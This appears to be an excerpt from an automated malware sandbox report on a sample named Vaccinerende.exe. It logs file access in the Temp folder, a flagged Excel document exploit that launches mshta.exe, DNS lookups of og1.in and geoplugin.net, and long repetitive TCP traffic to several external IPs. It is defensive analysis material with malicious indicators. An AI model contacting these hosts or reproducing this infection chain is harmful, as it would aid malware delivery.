          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Temp\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\AppData\Local\Temp\tsdrjareurci
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeFile opened: C:\Users\user\

          Software Vulnerabilities

          barindex
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
          Source: global trafficDNS query: name: og1.in
          Source: global trafficDNS query: name: og1.in
          Source: global trafficDNS query: name: og1.in
          Source: global trafficDNS query: name: geoplugin.net
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49176 -> 178.237.33.50:80
          Source: global trafficTCP traffic: 192.168.2.22:49177 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49163
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
          Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.22:80
          Source: global trafficTCP traffic: 192.3.220.22:80 -> 192.168.2.22:49166
